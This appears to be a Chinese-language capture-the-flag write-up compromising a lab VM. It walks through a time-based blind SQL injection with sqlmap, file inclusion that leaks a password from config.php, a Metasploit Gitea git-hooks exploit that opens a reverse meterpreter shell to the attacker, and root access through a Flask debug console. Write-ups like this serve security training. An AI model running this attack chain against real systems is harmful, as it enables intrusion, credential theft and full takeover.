难度:Medium
kali:192.168.56.104
靶机:192.168.56.146
端口扫描
┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 19:41 CST
Nmap scan report for 192.168.56.146
Host is up (0.000067s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
MAC Address: 08:00:27:43:A6:79 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
开放了 22 80 3000三个端口
先扫一下目录
┌──(root㉿kali2)-[~/Desktop]
└─# gobuster dir -u http://192.168.56.146 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.146
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,zip,html,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 279]
/.hta.txt (Status: 403) [Size: 279]
/.hta.html (Status: 403) [Size: 279]
/.hta.zip (Status: 403) [Size: 279]
/.hta.bak (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.hta.php (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htaccess.zip (Status: 403) [Size: 279]
/.htaccess.bak (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htpasswd.zip (Status: 403) [Size: 279]
/.htpasswd.bak (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/config.php (Status: 200) [Size: 0]
/index.html (Status: 200) [Size: 148]
/index.html (Status: 200) [Size: 148]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.146/javascript/]
/server-status (Status: 403) [Size: 279]
Progress: 27684 / 27690 (99.98%)
===============================================================
Finished
===============================================================
去web看看
源码有script.js
用post传个参数user_agent
测试发现存在sql注入
把请求包放到sqlmap跑一下
爆库
┌──(root㉿kali2)-[~/Desktop]
└─# sqlmap -l aa.txt --batch --dbs
___
__H__
___ ___[,]_____ ___ ___ {1.8.2#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:57:23 /2024-04-04/
[19:57:23] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.56.146:80/save-user-agent.php
Cookie: lang=zh-CN; i_like_gitea=926a348096e983b3; _csrf=WFlYdYemUXIyL4Tdd5QDXJG-hi46MTcxMjIzMTM0MDMxMTM3OTkzMA
POST data: {"user_agent":"1' or '1'='1"}
do you want to test this URL? [Y/n/q]
> Y
[19:57:23] [INFO] testing URL 'http://192.168.56.146:80/save-user-agent.php'
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
Cookie parameter '_csrf' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[19:57:23] [INFO] resuming back-end DBMS 'mysql'
[19:57:23] [INFO] using '/root/.local/share/sqlmap/output/results-04042024_0757pm.csv' as the CSV results file in multiple targets mode
[19:57:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON user_agent ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"user_agent":"1' or '1'='1' AND (SELECT 6368 FROM (SELECT(SLEEP(5)))mYMG) AND 'SwJT'='SwJT"}
---
do you want to exploit this SQL injection? [Y/n] Y
[19:57:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.57
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[19:57:23] [INFO] fetching database names
[19:57:23] [INFO] fetching number of databases
[19:57:23] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[19:57:23] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[19:57:33] [INFO] retrieved:
[19:57:38] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[19:58:35] [INFO] retrieved: logan
available databases [2]:
[*] information_schema
[*] logan
[19:58:52] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-04042024_0757pm.csv'
[*] ending @ 19:58:52 /2024-04-04/
爆表
┌──(root㉿kali2)-[~/Desktop]
└─# sqlmap -l aa.txt --batch -D logan -tables
___
__H__
___ ___[,]_____ ___ ___ {1.8.2#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:59:48 /2024-04-04/
[19:59:48] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.56.146:80/save-user-agent.php
Cookie: lang=zh-CN; i_like_gitea=926a348096e983b3; _csrf=WFlYdYemUXIyL4Tdd5QDXJG-hi46MTcxMjIzMTM0MDMxMTM3OTkzMA
POST data: {"user_agent":"1' or '1'='1"}
do you want to test this URL? [Y/n/q]
> Y
[19:59:48] [INFO] testing URL 'http://192.168.56.146:80/save-user-agent.php'
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
Cookie parameter '_csrf' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[19:59:48] [INFO] resuming back-end DBMS 'mysql'
[19:59:48] [INFO] using '/root/.local/share/sqlmap/output/results-04042024_0759pm.csv' as the CSV results file in multiple targets mode
[19:59:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON user_agent ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"user_agent":"1' or '1'='1' AND (SELECT 6368 FROM (SELECT(SLEEP(5)))mYMG) AND 'SwJT'='SwJT"}
---
do you want to exploit this SQL injection? [Y/n] Y
[19:59:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.57
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[19:59:48] [INFO] fetching tables for database: 'logan'
[19:59:48] [INFO] fetching number of tables for database 'logan'
[19:59:48] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[19:59:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[20:00:03] [INFO] adjusting time delay to 1 second due to good response times
3
[20:00:03] [INFO] retrieved: browser
[20:00:25] [INFO] retrieved: comments
[20:00:52] [INFO] retrieved: users
Database: logan
[3 tables]
+----------+
| browser |
| comments |
| users |
+----------+
[20:01:07] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-04042024_0759pm.csv'
[*] ending @ 20:01:07 /2024-04-04/
爆数据
┌──(root㉿kali2)-[~/Desktop]
└─# sqlmap -l aa.txt --batch -D logan -T users --dump
___
__H__
___ ___[.]_____ ___ ___ {1.8.2#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:01:43 /2024-04-04/
[20:01:43] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.56.146:80/save-user-agent.php
Cookie: lang=zh-CN; i_like_gitea=926a348096e983b3; _csrf=WFlYdYemUXIyL4Tdd5QDXJG-hi46MTcxMjIzMTM0MDMxMTM3OTkzMA
POST data: {"user_agent":"1' or '1'='1"}
do you want to test this URL? [Y/n/q]
> Y
[20:01:43] [INFO] testing URL 'http://192.168.56.146:80/save-user-agent.php'
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
Cookie parameter '_csrf' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[20:01:43] [INFO] resuming back-end DBMS 'mysql'
[20:01:43] [INFO] using '/root/.local/share/sqlmap/output/results-04042024_0801pm.csv' as the CSV results file in multiple targets mode
[20:01:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON user_agent ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"user_agent":"1' or '1'='1' AND (SELECT 6368 FROM (SELECT(SLEEP(5)))mYMG) AND 'SwJT'='SwJT"}
---
do you want to exploit this SQL injection? [Y/n] Y
[20:01:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.57
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:01:43] [INFO] fetching columns for table 'users' in database 'logan'
[20:01:43] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[20:01:43] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[20:01:53] [INFO] retrieved:
[20:01:58] [INFO] adjusting time delay to 1 second due to good response times
user
[20:02:09] [INFO] retrieved: email
[20:02:22] [INFO] fetching entries for table 'users' in database 'logan'
[20:02:22] [INFO] fetching number of entries for table 'users' in database 'logan'
[20:02:22] [INFO] retrieved: 1
[20:02:23] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
logan
[20:02:41] [INFO] retrieved: logan@newsitelogan.logan.hmv
Database: logan
Table: users
[1 entry]
+------------------------------+--------+
| email | user |
+------------------------------+--------+
| logan@newsitelogan.logan.hmv | logan |
+------------------------------+--------+
[20:04:19] [INFO] table 'logan.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.56.146/dump/logan/users.csv'
[20:04:19] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-04042024_0801pm.csv'
[*] ending @ 20:04:19 /2024-04-04/
有个子域,先添加到hosts
看源码貌似可以文件包含
测试发现可以目录穿越
发现可以apache日志包含,那就可以实现rce了,不过我的rce总是不能实现
然后用执行phpinfo的时候发现命令执行函数都被ban了
那就只能使用文件包含,想到扫目录的时候扫到一个config.php,里面可能有东西
通过include实现
logan:Super_logan1234ssh连接失败
去3000端口
又是一个gitea
登录一下
这次是低版本1.12.5 应该有漏洞
┌──(root㉿kali2)-[~/Desktop]
└─# searchsploit gitea 1.12
-------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------- ---------------------------------
Gitea 1.12.5 - Remote Code Execution (Authenticated) | multiple/webapps/49571.py
-------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
完美!
我选择用msf来rce
msf6 > search gitea 1.12.5
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/gitea_git_hooks_rce 2020-10-07 excellent Yes Gitea Git Hooks Remote Code Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/gitea_git_hooks_rce
msf6 > use 0
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_hooks_rce) > options
Module options (exploit/multi/http/gitea_git_hooks_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Password to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasplo
it/basics/using-metasploit.html
RPORT 3000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
USERNAME yes Username to authenticate with
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address
on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux Dropper
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/gitea_git_hooks_rce) > set PASSWORD Super_logan1234
PASSWORD => Super_logan1234
msf6 exploit(multi/http/gitea_git_hooks_rce) > set rhosts 192.168.56.146
rhosts => 192.168.56.146
msf6 exploit(multi/http/gitea_git_hooks_rce) > set USERNAME logan
USERNAME => logan
msf6 exploit(multi/http/gitea_git_hooks_rce) > set LHOST 192.168.56.104
LHOST => 192.168.56.104
msf6 exploit(multi/http/gitea_git_hooks_rce) > run
[*] Started reverse TCP handler on 192.168.56.104:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Gitea version is 1.12.5
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Authenticate with "logan/Super_logan1234"
[+] Logged in
[*] Create repository "Quo_Lux_Asoka"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Sending stage (3045380 bytes) to 192.168.56.146
[*] Meterpreter session 1 opened (192.168.56.104:4444 -> 192.168.56.146:40686) at 2024-04-04 20:59:07 +0800
[*] Command Stager progress - 100.00% done (833/833 bytes)
[*] Cleaning up
[*] Repository Quo_Lux_Asoka deleted.
meterpreter > id
[-] Unknown command: id
meterpreter > shell
Process 1736 created.
Channel 1 created.
sh: 0: getcwd() failed: No such file or directory
id
uid=104(git) gid=113(git) groups=113(git)
个人习惯,弹到kali上
sudo -l
git@logan2:~$ sudo -l
sudo -l
Matching Defaults entries for git on logan2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User git may run the following commands on logan2:
(ALL) NOPASSWD: /usr/bin/python3 /opt/app.py
git@logan2:~$ cat /opt/app.py
cat /opt/app.py
cat: /opt/app.py: Permission denied
不给看,那就执行以下看看
git@logan2:~$ sudo /usr/bin/python3 /opt/app.py
sudo /usr/bin/python3 /opt/app.py
* Serving Flask app 'app'
* Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on all addresses (0.0.0.0)
* Running on http://127.0.0.1:8000
* Running on http://127.0.0.1:8000
Press CTRL+C to quit
* Restarting with stat
* Debugger is active!
* Debugger PIN: 671-200-552
8000端口开了个服务还给了pin码
去终端看看
发现system不能用,那就用popen,结果发现自己是root了,那就把user flag和root flag都交了
觉得终端用不习惯的也可以弹个shell,都一样。
